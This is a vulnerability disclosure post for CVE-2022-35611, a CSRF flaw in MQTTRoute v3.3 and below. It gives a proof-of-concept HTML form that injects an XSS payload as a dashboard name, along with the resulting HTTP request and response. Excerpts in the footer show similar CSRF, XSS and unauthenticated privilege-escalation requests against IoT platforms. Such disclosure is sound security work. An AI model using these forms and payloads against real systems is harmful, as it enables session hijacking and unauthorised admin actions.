CVE-ID: CVE-2022-35611

A Cross-Site Request Forgery (CSRF) in MQTTRoute v3.3 and below allows attackers to create and remove dashboards. 

The HTTP requests issued by the application do not have anti-csrf tokens. As a result, an attacker can craft a malicious form, which when submitted by an unsuspecting user in a valid session, would make the server assume that the request has been sent willingly by the user.

Sample PoC form to create a dashboard:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8080/bwiot/api/v1/dashboard/" method="POST">
      <input type="hidden" name="name" value="SC&lt;img&#32;src&#61;&#35;&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="desc" value="ADV" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

An attacker can use CSRF to inject JavaScript as the dashboard name, granting the attacker access to the victim user's cookie, since the cookie is not marked as HTTPONLY.

Upon submitting the above form, the following request is sent to the server. Note that the origin of the request is not http://localhost:8080, which proves that it is a CSRF request.

HTTP Request:

POST /bwiot/api/v1/dashboard/ HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: http://burp
DNT: 1
Connection: close
Cookie: admin=177a54415aa44802851dcc4c04138c02
Upgrade-Insecure-Requests: 1

name=SC%3Cimg+src%3D%23+onerror%3Dalert%28document.cookie%29%3E&desc=ADV

HTTP Response:

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2022 07:58:44 GMT
Server: TornadoServer/3.1
Content-Length: 135
Content-Type: application/json; charset=UTF-8

{"id": 6, "status": "Success", "description": "ADV", "name": "SC<img src=# onerror=alert(document.cookie)>", "time": 1656662324989.478}

The XSS popup happens as expected, when the admin user visits the dashboard page.


References:

Popular posts from this blog

CVE-ID: CVE-2022-35135, CVE-2022-35136

CVE-2022-35136:  Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests. CVE-2022-35135:  Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges  via a crafted request sent to /api/user/upsert/<uuid>.  The platform successfully processes API requests even without valid cookies.For example, the following request to update user profile is processed, even though the request does not have any cookie/api key. (Cookie header is blank in the request) Since API requests to the platform are not authenticated, a user can assign themselves an admin role, by sending a request to  http://192.168.72.157/api/user/upsert/<userid>  endpoint. HTTP Request: POST /api/user/upsert/8c34fa03- 706a-4dc7-b484-cd8e0c329c81 HTTP/1.1 Host: 192.168.72.157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Re
Read more

CVE-ID: CVE-2022-35134

Image
  Boodskap  IoT Platform v4.4.9-02 contains a cross-site scripting (XSS)  vulnerability. The application does not enforce input validation and output sanitization in multiple functionalities.  Example 1: domain name can be set to <script>alert(1)</script> Example 2: A lower privilege user can change their name to include a XSS payload, and target the admin user References: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
Read more

CVE-ID: CVE-2022-34020

Cross Site Request Forgery (CSRF) vulnerability in ResIOT ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 allows attackers to add new admin users to the platform or other unspecified impacts. ResIOT® IOT Platform + LoRaWAN Network Server (on-premise version) V.4.1.1000114  does not use any CSRF protection mechanism. It is possible for an attacker to launch CSRF attacks against users of the platform. An attacker can abuse CSRF to perform actions, such as creating a user on the platform. For this, the attacker can prepare a HTML form such as follows, host it online and send the form's link to a ResIoT admin user. <html>   <body>   <script>history.pushState('', '', '/')</script>     <form action=" http://172.20.32.1: 8088/UserorgApi/?domain=172. 20.32.1&protocol=http:&email= test111@gmail.com&firstname= test&lastname=one&password= V79NrFNCAxZNXtg&phone= 77777777777 " method="POST
Read more